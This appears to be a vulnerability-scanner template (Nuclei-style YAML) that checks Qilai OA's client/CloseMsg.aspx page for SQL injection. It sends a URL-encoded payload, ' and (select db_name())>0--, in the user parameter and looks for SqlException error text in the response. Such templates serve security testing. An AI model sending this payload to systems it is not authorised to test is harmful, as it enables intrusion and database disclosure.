id: qilai-oa-sqli1

info:
  name: 启莱OA CloseMsg.aspx SQL注入漏洞
  author: str1am
  severity: critical
  reference:
    - https://github.com/govbk/WIKI-POC-EXP/blob/7d1194429dab9f9dd8139408e79b70ddb41a468f/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%90%AF%E8%8E%B1OA/%E5%90%AF%E8%8E%B1OA%20CloseMsg.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  tags: oa,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/client/CloseMsg.aspx?user=%27%20and%20(select%20db_name())>0--&pwd=1"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "nvarchar"
          - "SqlException"
        part: body
        condition: and
